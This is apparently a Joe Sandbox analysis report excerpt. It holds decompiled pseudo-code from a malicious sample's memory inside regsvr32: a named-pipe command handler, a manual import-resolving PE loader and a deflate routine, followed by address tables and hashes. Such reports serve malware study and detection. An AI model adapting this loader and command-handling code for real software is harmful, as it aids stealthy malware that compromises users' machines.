                                                                                                                                                                                              							_push(_v200);
                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t118 = _t80 - 1;
                                                                                                                                                                                              						if(_t118 == 0) {
                                                                                                                                                                                              							_t200 = E042A9B33( &(_t149[4]), 0x20, 1,  &_v176);
                                                                                                                                                                                              							_v196 = _t200;
                                                                                                                                                                                              							__eflags = _t200;
                                                                                                                                                                                              							if(_t200 == 0) {
                                                                                                                                                                                              								L30:
                                                                                                                                                                                              								_t192 =  *0x42bf8bc; // 0x0
                                                                                                                                                                                              								E042A9EDB( &_v164,  &(_t192[4]), 0x80);
                                                                                                                                                                                              								_push(0x84);
                                                                                                                                                                                              								_push( &_v168);
                                                                                                                                                                                              								_push(2);
                                                                                                                                                                                              								goto L31;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t205 = _v176;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								_t124 = E042A1DD3(E042A9F6F( *_t200, __eflags), 0, 0, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t124;
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t125 = _t205 - 1;
                                                                                                                                                                                              							_v184 = _t205 - 1;
                                                                                                                                                                                              							_t127 = E042A8BDE(_t125 << 2);
                                                                                                                                                                                              							_v188 = _t127;
                                                                                                                                                                                              							__eflags = _t127;
                                                                                                                                                                                              							if(_t127 == 0) {
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t148 = 1;
                                                                                                                                                                                              							__eflags = _t205 - 1;
                                                                                                                                                                                              							if(__eflags <= 0) {
                                                                                                                                                                                              								L28:
                                                                                                                                                                                              								_t129 = E042A1DD3(E042A9F6F( *_t200, __eflags), _t127, _v184, 0);
                                                                                                                                                                                              								_t208 = _t208 + 0x10;
                                                                                                                                                                                              								_v168 = _t129;
                                                                                                                                                                                              								E042A9C2C( &_v176);
                                                                                                                                                                                              								goto L30;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v204 = _t127;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t132 = E042A9880( *((intOrPtr*)(_t200 + _t148 * 4)), E042AA43D( *((intOrPtr*)(_t200 + _t148 * 4))));
                                                                                                                                                                                              								_t183 = _v204;
                                                                                                                                                                                              								_t148 = _t148 + 1;
                                                                                                                                                                                              								 *_t183 = _t132;
                                                                                                                                                                                              								_v204 = _t183 + 4;
                                                                                                                                                                                              								__eflags = _t148 - _t205;
                                                                                                                                                                                              							} while (__eflags < 0);
                                                                                                                                                                                              							_t127 = _v188;
                                                                                                                                                                                              							goto L28;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t133 = _t118 - 3;
                                                                                                                                                                                              						if(_t133 == 0) {
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_push(0);
                                                                                                                                                                                              							_t196 = 5;
                                                                                                                                                                                              							E042A5EC3(E042AD1A6(_t196));
                                                                                                                                                                                              							_v172 = 1;
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t137 = _t133;
                                                                                                                                                                                              						if(_t137 == 0) {
                                                                                                                                                                                              							_t84 = E042B0940( &_v200);
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t137 != 1) {
                                                                                                                                                                                              							goto L56;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E042B0940( &_v200);
                                                                                                                                                                                              						goto L12;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return 0;
                                                                                                                                                                                              			}
























































                                                                                                                                                                                              0x042a3899
                                                                                                                                                                                              0x042a3936
                                                                                                                                                                                              0x042a3936
                                                                                                                                                                                              0x042a3948
                                                                                                                                                                                              0x042a394e
                                                                                                                                                                                              0x042a3957
                                                                                                                                                                                              0x042a3958
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3958
                                                                                                                                                                                              0x042a389f
                                                                                                                                                                                              0x042a38a3
                                                                                                                                                                                              0x042a38a6
                                                                                                                                                                                              0x042a392a
                                                                                                                                                                                              0x042a392f
                                                                                                                                                                                              0x042a3932
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3932
                                                                                                                                                                                              0x042a38a8
                                                                                                                                                                                              0x042a38ab
                                                                                                                                                                                              0x042a38b3
                                                                                                                                                                                              0x042a38b8
                                                                                                                                                                                              0x042a38bd
                                                                                                                                                                                              0x042a38bf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a38c3
                                                                                                                                                                                              0x042a38c4
                                                                                                                                                                                              0x042a38c6
                                                                                                                                                                                              0x042a38f5
                                                                                                                                                                                              0x042a3904
                                                                                                                                                                                              0x042a3909
                                                                                                                                                                                              0x042a390c
                                                                                                                                                                                              0x042a3918
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3918
                                                                                                                                                                                              0x042a38c8
                                                                                                                                                                                              0x042a38cc
                                                                                                                                                                                              0x042a38da
                                                                                                                                                                                              0x042a38df
                                                                                                                                                                                              0x042a38e3
                                                                                                                                                                                              0x042a38e4
                                                                                                                                                                                              0x042a38e9
                                                                                                                                                                                              0x042a38ed
                                                                                                                                                                                              0x042a38ed
                                                                                                                                                                                              0x042a38f1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a38f1
                                                                                                                                                                                              0x042a3815
                                                                                                                                                                                              0x042a3818
                                                                                                                                                                                              0x042a3860
                                                                                                                                                                                              0x042a3861
                                                                                                                                                                                              0x042a3864
                                                                                                                                                                                              0x042a386c
                                                                                                                                                                                              0x042a3871
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3871
                                                                                                                                                                                              0x042a381b
                                                                                                                                                                                              0x042a381e
                                                                                                                                                                                              0x042a3847
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a3847
                                                                                                                                                                                              0x042a3823
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a382e
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x042a382e
                                                                                                                                                                                              0x042a37e7
                                                                                                                                                                                              0x042a3b1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 042A37B2
                                                                                                                                                                                                • Part of subcall function 042AD1A6: FlushFileBuffers.KERNEL32(00000000,?,042A3AC6,00000000,00000004), ref: 042AD1EC
                                                                                                                                                                                              • DisconnectNamedPipe.KERNEL32 ref: 042A3B03
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: BuffersDisconnectErrorFileFlushLastNamedPipe
                                                                                                                                                                                              • String ID: %u.%u.%u.%u:%u
                                                                                                                                                                                              • API String ID: 465096328-3858738763
                                                                                                                                                                                              • Opcode ID: 2dbaeb198064519a30b93d885390d5fd6897bbbc96dc3a965909b1f911eaf715
                                                                                                                                                                                              • Instruction ID: 5c5330883bae30cfc6645f1154185a664dff2598db1ffbaa15da5071a5fd4a24
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2dbaeb198064519a30b93d885390d5fd6897bbbc96dc3a965909b1f911eaf715
                                                                                                                                                                                              • Instruction Fuzzy Hash: B8A1D3B2728302AFE314DF64D884A6BB7E8EB84314F04491EFD95C7180EB34E964CB56
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E042B370B(signed int __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                              				intOrPtr* _v8;
                                                                                                                                                                                              				signed int* _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				signed int _v20;
                                                                                                                                                                                              				signed int _v24;
                                                                                                                                                                                              				signed int _v28;
                                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				struct HINSTANCE__* _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				signed int _v56;
                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                              				signed int _v64;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				signed int _t112;
                                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                                              				void* _t163;
                                                                                                                                                                                              				void* _t167;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t167 = __ecx;
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              				if(_a4 != 0) {
                                                                                                                                                                                              					_v48 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                                              					_v40 = E042AEFA7(_t167, _v48, "GetProcAddress");
                                                                                                                                                                                              					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                              					_v32 = _v52;
                                                                                                                                                                                              					_t109 = 8;
                                                                                                                                                                                              					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
                                                                                                                                                                                              						L24:
                                                                                                                                                                                              						return 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v56 = 0x80000000;
                                                                                                                                                                                              					_t112 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_v8 = _v8 + 0x14;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t115 = 8;
                                                                                                                                                                                              					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
                                                                                                                                                                                              						_t34 = _v8 + 0xc; // 0xffff
                                                                                                                                                                                              						_v36 = LoadLibraryA( *_t34 + _a4);
                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                              							if( *_v8 == 0) {
                                                                                                                                                                                              								_t43 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              								_v12 =  *_t43 + _a4;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v12 =  *_v8 + _a4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v28 = _v28 & 0x00000000;
                                                                                                                                                                                              							while( *_v12 != 0) {
                                                                                                                                                                                              								_v24 = _v24 & 0x00000000;
                                                                                                                                                                                              								_v16 = _v16 & 0x00000000;
                                                                                                                                                                                              								_v64 = _v64 & 0x00000000;
                                                                                                                                                                                              								_v20 = _v20 & 0x00000000;
                                                                                                                                                                                              								if(( *_v12 & _v56) == 0) {
                                                                                                                                                                                              									_v60 =  *_v12 + _a4;
                                                                                                                                                                                              									_v20 = _v60 + 2;
                                                                                                                                                                                              									_t73 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              									_v24 =  *((intOrPtr*)( *_t73 + _a4 + _v28));
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_v24 =  *_v12;
                                                                                                                                                                                              									_v20 = _v24 & 0x0000ffff;
                                                                                                                                                                                              									_v16 = _v40(_v36, _v20);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(_v24 != _v16) {
                                                                                                                                                                                              									_v44 = _v44 + 1;
                                                                                                                                                                                              									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
                                                                                                                                                                                              										 *_v12 = _v16;
                                                                                                                                                                                              									} else {
                                                                                                                                                                                              										_t89 = _v8 + 0x10; // 0xb8
                                                                                                                                                                                              										 *( *_t89 + _a4 + _v28) = _v16;
                                                                                                                                                                                              									}
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v12 =  &(_v12[1]);
                                                                                                                                                                                              								_v28 = _v28 + 4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v8 = _v8 + 0x14;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t163 = 0xfffffffd;
                                                                                                                                                                                              						return _t163;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L24;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return __eax | 0xffffffff;
                                                                                                                                                                                              			}
























                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 042B3728
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 042B37C1
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042A0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_28_2_42a0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleLibraryLoadModule
                                                                                                                                                                                              • String ID: GetProcAddress$kernel32.dll
                                                                                                                                                                                              • API String ID: 4133054770-1584408056
                                                                                                                                                                                              • Opcode ID: 5bece43bf096662d67de26d6c7eb87f9a3dfbeb91cd56bb5b59e83ecfbeec31c
                                                                                                                                                                                              • Instruction ID: efeee0b64e1ceccac02c5f25b280c8c493df26298a34b24db745e9b251e85ea4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bece43bf096662d67de26d6c7eb87f9a3dfbeb91cd56bb5b59e83ecfbeec31c
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D618DB5E10209EFDB00CF98C485BEDBBF1BF08355F248599E855AB291D374AA80DF90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 99%
                                                                                                                                                                                              			E042B4100(int _a4, signed int _a8) {
                                                                                                                                                                                              				int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t141;
                                                                                                                                                                                              				intOrPtr* _t142;
                                                                                                                                                                                              				signed int _t145;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				intOrPtr _t151;
                                                                                                                                                                                              				intOrPtr _t161;
                                                                                                                                                                                              				intOrPtr _t162;
                                                                                                                                                                                              				intOrPtr _t167;
                                                                                                                                                                                              				intOrPtr _t170;
                                                                                                                                                                                              				signed int _t172;
                                                                                                                                                                                              				intOrPtr _t173;
                                                                                                                                                                                              				int _t184;
                                                                                                                                                                                              				intOrPtr _t185;
                                                                                                                                                                                              				intOrPtr _t188;
                                                                                                                                                                                              				signed int _t189;
                                                                                                                                                                                              				void* _t195;
                                                                                                                                                                                              				int _t202;
                                                                                                                                                                                              				int _t208;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				signed int _t218;
                                                                                                                                                                                              				int _t219;
                                                                                                                                                                                              				intOrPtr _t220;
                                                                                                                                                                                              				signed int _t221;
                                                                                                                                                                                              				signed int _t222;
                                                                                                                                                                                              				int _t224;
                                                                                                                                                                                              				int _t225;
                                                                                                                                                                                              				signed int _t227;
                                                                                                                                                                                              				intOrPtr _t228;
                                                                                                                                                                                              				int _t232;
                                                                                                                                                                                              				int _t234;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				int _t239;
                                                                                                                                                                                              				void* _t240;
                                                                                                                                                                                              				int _t245;
                                                                                                                                                                                              				int _t252;
                                                                                                                                                                                              				signed int _t253;
                                                                                                                                                                                              				int _t254;
                                                                                                                                                                                              				void* _t257;
                                                                                                                                                                                              				void* _t258;
                                                                                                                                                                                              				int _t259;
                                                                                                                                                                                              				intOrPtr _t260;
                                                                                                                                                                                              				int _t261;
                                                                                                                                                                                              				signed int _t269;
                                                                                                                                                                                              				signed int _t271;
                                                                                                                                                                                              				intOrPtr* _t272;
                                                                                                                                                                                              				void* _t273;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t253 = _a8;
                                                                                                                                                                                              				_t272 = _a4;
                                                                                                                                                                                              				_t3 = _t272 + 0xc; // 0x452bf84d
                                                                                                                                                                                              				_t4 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              				_t228 =  *_t4;
                                                                                                                                                                                              				_t137 =  *_t3 + 0xfffffffb;
                                                                                                                                                                                              				_t229 =  <=  ? _t137 : _t228;
                                                                                                                                                                                              				_v16 =  <=  ? _t137 : _t228;
                                                                                                                                                                                              				_t269 = 0;
                                                                                                                                                                                              				_a4 =  *((intOrPtr*)( *_t272 + 4));
                                                                                                                                                                                              				asm("o16 nop [eax+eax]");
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t8 = _t272 + 0x16bc; // 0xfed1e900
                                                                                                                                                                                              					_t141 =  *_t8 + 0x2a >> 3;
                                                                                                                                                                                              					_v12 = 0xffff;
                                                                                                                                                                                              					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
                                                                                                                                                                                              					if(_t217 < _t141) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t11 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              					_t12 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              					_t245 =  *_t11 -  *_t12;
                                                                                                                                                                                              					_v8 = _t245;
                                                                                                                                                                                              					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
                                                                                                                                                                                              					_t247 =  <  ? _t195 : _v12;
                                                                                                                                                                                              					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
                                                                                                                                                                                              					if(_t227 >= _v16) {
                                                                                                                                                                                              						L7:
                                                                                                                                                                                              						if(_t253 != 4) {
                                                                                                                                                                                              							L10:
                                                                                                                                                                                              							_t269 = 0;
                                                                                                                                                                                              							__eflags = 0;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t285 = _t227 - _t195;
                                                                                                                                                                                              							if(_t227 != _t195) {
                                                                                                                                                                                              								goto L10;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_t269 = _t253 - 3;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E042B7120(_t272, _t272, 0, 0, _t269);
                                                                                                                                                                                              						_t18 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t19 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *( *_t18 +  *_t19 - 4) = _t227;
                                                                                                                                                                                              						_t22 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t23 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
                                                                                                                                                                                              						_t26 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t27 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *( *_t26 +  *_t27 - 2) =  !_t227;
                                                                                                                                                                                              						_t30 = _t272 + 0x14; // 0xc703f045
                                                                                                                                                                                              						_t31 = _t272 + 8; // 0x8d000040
                                                                                                                                                                                              						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
                                                                                                                                                                                              						E042B5E80(_t285,  *_t272);
                                                                                                                                                                                              						_t202 = _v8;
                                                                                                                                                                                              						_t273 = _t273 + 0x14;
                                                                                                                                                                                              						if(_t202 != 0) {
                                                                                                                                                                                              							_t208 =  >  ? _t227 : _t202;
                                                                                                                                                                                              							_v8 = _t208;
                                                                                                                                                                                              							_t36 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t37 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t252 = _v8;
                                                                                                                                                                                              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
                                                                                                                                                                                              							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
                                                                                                                                                                                              							_t227 = _t227 - _t252;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t227 != 0) {
                                                                                                                                                                                              							E042B5FC0( *_t272,  *( *_t272 + 0xc), _t227);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
                                                                                                                                                                                              							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t253 = _a8;
                                                                                                                                                                                              						if(_t269 == 0) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_t227 != 0 || _t253 == 4) {
                                                                                                                                                                                              							if(_t253 != 0 && _t227 == _t195) {
                                                                                                                                                                                              								goto L7;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					break;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t142 =  *_t272;
                                                                                                                                                                                              				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
                                                                                                                                                                                              				_a4 = _t232;
                                                                                                                                                                                              				if(_t232 == 0) {
                                                                                                                                                                                              					_t83 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              					_t254 =  *_t83;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t59 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              					_t224 =  *_t59;
                                                                                                                                                                                              					if(_t232 < _t224) {
                                                                                                                                                                                              						_t65 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                              						_t66 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              						_t260 =  *_t66;
                                                                                                                                                                                              						__eflags =  *_t65 - _t260 - _t232;
                                                                                                                                                                                              						if( *_t65 - _t260 <= _t232) {
                                                                                                                                                                                              							_t67 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							_t261 = _t260 - _t224;
                                                                                                                                                                                              							 *(_t272 + 0x6c) = _t261;
                                                                                                                                                                                              							memcpy( *_t67,  *_t67 + _t224, _t261);
                                                                                                                                                                                              							_t70 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                                              							_t188 =  *_t70;
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t232 = _a4;
                                                                                                                                                                                              							__eflags = _t188 - 2;
                                                                                                                                                                                              							if(_t188 < 2) {
                                                                                                                                                                                              								_t189 = _t188 + 1;
                                                                                                                                                                                              								__eflags = _t189;
                                                                                                                                                                                              								 *(_t272 + 0x16b0) = _t189;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t73 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                                                                                                                                                                              						_t225 = _a4;
                                                                                                                                                                                              						_t273 = _t273 + 0xc;
                                                                                                                                                                                              						_t76 = _t272 + 0x6c;
                                                                                                                                                                                              						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                                                                                                                                                                              						__eflags =  *_t76;
                                                                                                                                                                                              						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              						_t184 =  *_t78;
                                                                                                                                                                                              						_t79 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t239 =  *_t79;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						 *(_t272 + 0x16b0) = 2;
                                                                                                                                                                                              						_t61 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              						memcpy( *_t61,  *_t142 - _t224, _t224);
                                                                                                                                                                                              						_t62 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              						_t184 =  *_t62;
                                                                                                                                                                                              						_t273 = _t273 + 0xc;
                                                                                                                                                                                              						_t225 = _a4;
                                                                                                                                                                                              						_t239 = _t184;
                                                                                                                                                                                              						 *(_t272 + 0x6c) = _t184;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t254 = _t184;
                                                                                                                                                                                              					 *(_t272 + 0x5c) = _t184;
                                                                                                                                                                                              					_t81 = _t272 + 0x16b4; // 0xed7505f9
                                                                                                                                                                                              					_t185 =  *_t81;
                                                                                                                                                                                              					_t240 = _t239 - _t185;
                                                                                                                                                                                              					_t241 =  <=  ? _t225 : _t240;
                                                                                                                                                                                              					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                              					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if( *(_t272 + 0x16c0) < _t254) {
                                                                                                                                                                                              					 *(_t272 + 0x16c0) = _t254;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				if(_t269 == 0) {
                                                                                                                                                                                              					_t218 = _a8;
                                                                                                                                                                                              					__eflags = _t218;
                                                                                                                                                                                              					if(_t218 == 0) {
                                                                                                                                                                                              						L34:
                                                                                                                                                                                              						_t89 = _t272 + 0x3c; // 0x830cc483
                                                                                                                                                                                              						_t219 =  *_t272;
                                                                                                                                                                                              						_t145 =  *_t89 - _t254 - 1;
                                                                                                                                                                                              						_a4 =  *_t272;
                                                                                                                                                                                              						_t234 = _t254;
                                                                                                                                                                                              						_v16 = _t145;
                                                                                                                                                                                              						_v8 = _t254;
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                                                                                                                                                                              						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                                                                                                                                                                              							_v8 = _t254;
                                                                                                                                                                                              							_t95 = _t272 + 0x5c; // 0xbde85000
                                                                                                                                                                                              							_a4 = _t219;
                                                                                                                                                                                              							_t234 = _t254;
                                                                                                                                                                                              							_t97 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              							__eflags =  *_t95 -  *_t97;
                                                                                                                                                                                              							if( *_t95 >=  *_t97) {
                                                                                                                                                                                              								_t98 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              								_t167 =  *_t98;
                                                                                                                                                                                              								_t259 = _t254 - _t167;
                                                                                                                                                                                              								_t99 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                                                                                                                                                                              								 *(_t272 + 0x6c) = _t259;
                                                                                                                                                                                              								memcpy( *_t99, _t167 +  *_t99, _t259);
                                                                                                                                                                                              								_t103 = _t272 + 0x16b0; // 0x8341ffff
                                                                                                                                                                                              								_t170 =  *_t103;
                                                                                                                                                                                              								_t273 = _t273 + 0xc;
                                                                                                                                                                                              								__eflags = _t170 - 2;
                                                                                                                                                                                              								if(_t170 < 2) {
                                                                                                                                                                                              									_t172 = _t170 + 1;
                                                                                                                                                                                              									__eflags = _t172;
                                                                                                                                                                                              									 *(_t272 + 0x16b0) = _t172;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t106 = _t272 + 0x2c; // 0x8df075ff
                                                                                                                                                                                              								_t145 = _v16 +  *_t106;
                                                                                                                                                                                              								__eflags = _t145;
                                                                                                                                                                                              								_a4 =  *_t272;
                                                                                                                                                                                              								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                                                                                                                                                                              								_t234 =  *_t108;
                                                                                                                                                                                              								_v8 = _t234;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t255 = _a4;
                                                                                                                                                                                              						_t220 =  *((intOrPtr*)(_a4 + 4));
                                                                                                                                                                                              						__eflags = _t145 - _t220;
                                                                                                                                                                                              						_t221 =  <=  ? _t145 : _t220;
                                                                                                                                                                                              						_t146 = _t221;
                                                                                                                                                                                              						_a4 = _t221;
                                                                                                                                                                                              						_t222 = _a8;
                                                                                                                                                                                              						__eflags = _t146;
                                                                                                                                                                                              						if(_t146 != 0) {
                                                                                                                                                                                              							_t114 = _t272 + 0x38; // 0xf47d8bff
                                                                                                                                                                                              							E042B5FC0(_t255,  *_t114 + _v8, _t146);
                                                                                                                                                                                              							_t273 = _t273 + 0xc;
                                                                                                                                                                                              							_t117 = _t272 + 0x6c;
                                                                                                                                                                                              							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                                                                                                                                                                              							__eflags =  *_t117;
